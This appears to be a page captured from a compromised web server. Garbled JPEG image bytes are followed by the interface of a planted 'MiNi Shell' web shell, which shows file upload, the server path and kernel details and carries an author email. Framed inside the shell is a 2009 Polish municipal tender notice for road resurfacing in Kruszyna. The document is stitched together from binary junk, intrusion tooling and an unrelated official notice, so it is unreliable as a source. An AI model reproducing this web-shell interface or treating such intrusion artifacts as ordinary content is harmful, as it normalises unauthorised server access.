JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/131211-N-2009.html

<p class="kh_header"><b>Kruszyna: Remont dróg gminnych w technologii nakładek mineralno - bitumicznych</b><br>
<b>Numer ogłoszenia: 131211 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kruszyna , ul. Kmicica 5, 42-282 Kruszyna, woj. śląskie, tel. 034 3202003, faks 034 3202054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.kruszyna.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont dróg gminnych w technologii nakładek mineralno - bitumicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane obejmujące wykonanie remontu dróg gminnych w technologii nakładek mineralno - bitumicznych w następujących miejscowościach:
- Jacków Pustkowie, droga gminna nr 694141 S, wykonanie nawierzchni - długość 270 mb, szerokość jezdni 4,0 m.
- Kruszyna ul. Ogrodowa, droga gminna nr 694230 S, wykonanie nawierzchni -  długość 520 mb, szerokość jezdni 4,5 m.
- Lgota Mała ul. Ogrodowa, droga gminna nr 694320 S, wykonanie nawierzchni -  długość 310 mb, szerokość jezdni 5,0 m, oraz wykonanie odwodnienia - długość      459 mb.
- Widzów ul. Kościelna, droga gminna nr 694451 S, wykonanie nawierzchni -  długość 170 mb, szerokość jezdni 4,2 m.        .

Zakres robót obejmuje:
1. W odniesieniu do miejscowości Jacków Pustkowie:
a) roboty pomiarowe - 0,27 km,
b) skropienie nawierzchni drogowej asfaltem - 1080 m2,
c) ułożenie warstwy wiążącej nawierzchni z mieszanek mineralno-bitumicznych grubości 2 cm - 1080 m2,
d) ułożenie warstwy ścieralnej nawierzchni z mieszanek mineralno-bitumicznych grubości 3 cm - 1080 m2,
e) plantowanie poboczy z gruntu rodzimego - 270 m2.
2. W odniesieniu do miejscowości Kruszyna ul. Ogrodowa:
a) roboty pomiarowe - 0,52 km,
b) poszerzenie jezdni poprzez wykonanie koryta a następnie podbudowy z kruszywa łamanego grub. 20 cm - 66 m2,
c) skropienie nawierzchni drogowej asfaltem - 3009,5 m2,
d) ułożenie warstwy wiążącej nawierzchni z mieszanek mineralno-bitumicznych grubości 2 cm - 3009,5 m2,
e) ułożenie warstwy ścieralnej nawierzchni z mieszanek mineralno-bitumicznych grubości 3 cm - 3009,5 m2,
f) wykonanie poboczy z tłucznia kamiennego grub. 12 cm - 780 m2,
g) oczyszczenie rowu z namułu - 120 m.
3. W odniesieniu do miejscowości Lgota Mała ul. Ogrodowa:
a) roboty pomiarowe odwodnienia - 0,51 km,
b) roboty ziemne wykonane koparkami przedsiębiernymi - 147,44 m3,
c) humusowanie skarp przy grubości warstwy humusu 10 cm - 460 m2,
d) ława pod krawężniki betonowa z oporem - 64,72 m3,
e) ścieki z prefabrykatów betonowych o grub. 15 cm - 459 m,
f) podbudowa z kruszywa łamanego, warstwa dolna o grub. 15 cm - 229,5 m2,
g) podbudowa z kruszywa łamanego, warstwa górna o grub. 8 cm - 229,5 m2,
h) nawierzchnia z kostki brukowej betonowej grub. 8 cm - 229,5 m2,
i) studzienki ściekowe betonowe śr. 500 mm z osadnikiem bez syfonu - 2 szt.
j) studnie rewizyjne z kręgów betonowych o śr. 1200 mm - 1 studnia,
k) roboty pomiarowe nawierzchni - 0,31 km,
l) skropienie nawierzchni drogowej asfaltem - 1565,5 m2,
m) ułożenie warstwy wiążącej nawierzchni z mieszanek mineralno-bitumicznych grubości 2 cm - 1565,5 m2,
n) ułożenie warstwy ścieralnej nawierzchni z mieszanek mineralno-bitumicznych grubości 3 cm - 1565,5 m2,
o) regulacja pionowa studzienek dla zaworów wodociągowych - 20 szt.
p) wykonanie poboczy z tłucznia kamiennego grub. 12 cm - 232,5 m2.
4. W odniesieniu do miejscowości Widzów ul. Kościelna:
a) roboty pomiarowe - 0,17 km,
b) wyrównanie istniejącej nawierzchni z frezu mieszanką mineralno - asfaltową - 2,8 tony,
c) skropienie nawierzchni drogowej asfaltem - 762 m2,
d) ułożenie warstwy wiążącej nawierzchni z mieszanek mineralno-bitumicznych grubości 2 cm - 762 m2,
e) ułożenie warstwy ścieralnej nawierzchni z mieszanek mineralno-bitumicznych grubości 3 cm - 762 m2,
f) regulacja pionowa studzienek dla włazów kanałowych - 5 szt.
g) regulacja pionowa studzienek dla zaworów wodociągowych - 4 szt.
h) Ręczne formowanie poboczy z ziemi dowożonej - 8,5 m3.     .

Szczegółowy zakres zawierają:
1. przedmiary robót stanowiące Załącznik nr 4, 5, 6, 7 oraz 8 do SIWZ,
2. Specyfikacje Techniczne Wykonania i Odbioru Robót stanowiące Załącznik nr 9 i 10 do SIWZ,
3. projekty techniczne stanowiące Załącznik nr 11, 12, 13, 14 według wariantu II oraz Załącznik nr 15 do SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6, 45.11.12.00-0, 45.23.32.20-7, 45.23.24.51-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga od Wykonawców wniesienia wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych 00/100)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się wykonawcy, którzy spełniają  warunki: 
1.1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
1.2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, a w szczególności:
a) w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej dwa zamówienia, polegające na budowie, przebudowie lub remoncie drogi z użyciem mieszanki mineralno-bitumicznej grysowej na powierzchni minimum 5000,0 m2 każde zadanie. Do oferty należy załączyć dokument potwierdzający należyte wykonane zamówienie,
1.3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2. Ocena spełnienia w/w warunków dokonana zostanie na podstawie przedłożonych dokumentów i oświadczeń wyszczególnionych w pkt. IX SIWZ, według formuły spełnia - nie spełnia.
3. Nie spełnienie chociażby jednego z w/w warunków skutkować będzie wykluczeniem Wykonawcy z postępowania. Ofertę Wykonawcy wykluczonego z postępowania uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony formularz oferty - wzór załącznik nr 1.
2. Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (t.j. Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) na formularzu stanowiącym załącznik nr 2.
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5. W celu udokumentowania posiadanego doświadczenia zawodowego należy dołączyć do oferty wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zadań (min. 2 zadania) polegających na budowie, przebudowie lub remoncie dróg z użyciem mieszanki mineralno-bitumicznej grysowej na powierzchni minimum 5000,0 m2 każde zadanie, wraz z dokumentami potwierdzającymi, że zadania te zostały wykonane należycie. Wykaz musi zawierać dane obejmujące powierzchnię wykonanej nawierzchni, wartość, termin i lokalizację wykonanych zadań (wzór załącznik nr 3).
6. Polisę, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 50.000,00 zł.
7. Kosztorys ofertowy z cenami jednostkowymi i wartością stanowiącą cenę zamówienia: cena netto + podatek VAT = cena brutto.
Kosztorys ofertowy przygotować zgodnie z załączonymi do SIWZ przedmiarami .
Zakres robót do wykonania i wielkości tylko na podstawie przedmiaru robót. 
Cenę oferty należy obliczyć metodą kalkulacji szczegółowej z podaniem: zestawienia materiałów wraz z cenami, zestawienia cen sprzętu, robocizny i składników cenotwórczych przy zachowaniu następujących założeń:
a) zakres robót, który jest podstawą do określenia ceny, musi być zgodny z zakresem robót określonym w przedmiarach robót, wyszczególnionych w załączniku nr 4, 5, 6, 7 oraz 8  do niniejszej SIWZ, 
b) cena musi zawierać wszystkie koszty związane z realizacją zadania, wynikające wprost z przedmiaru robót, jak również następujące koszty: wszelkich robót przygotowawczych, porządkowych, projektu organizacji placu budowy wraz z jego późniejszą likwidacją, koszty utrzymania zaplecza budowy, koszty związane z odbiorami wykonanych robót, wykonania dokumentacji powykonawczej oraz inne koszty wynikające z umowy, której wzór stanowi załącznik nr 16 do SIWZ,
c) nie dopuszcza się stosowania opustów ( zarówno do wyliczonych cen jednostkowych, jak również do ogólnej ceny oferty),
d) w przypadku wystąpienia robót dodatkowych ceny tych samych składników cenotwórczych (R, Ko, Z, M, S) muszą być takie same dla wszystkich wycenionych pozycji przedmiarowych.     .

Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. IX. 3, 4 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty o których mowa w pkt. 1) i 3) powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, natomiast dokument o którym mowa w pkt. 2) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów wymienionych w pkt 1), 2) i 3) zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania.

Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnienie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.kruszyna.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kruszynie, ul. Kmicica 5, 42-282 Kruszyna, pok. nr 6. SIWZ jest wydawana bezpłatnie przy czym w przypadku wysłania przesyłką pocztową, Wykonawca ponosi koszty wysyłki.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Urząd Gminy w Kruszynie, ul. Kmicica 5, 42-282 Kruszyna, pok. Nr 18.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com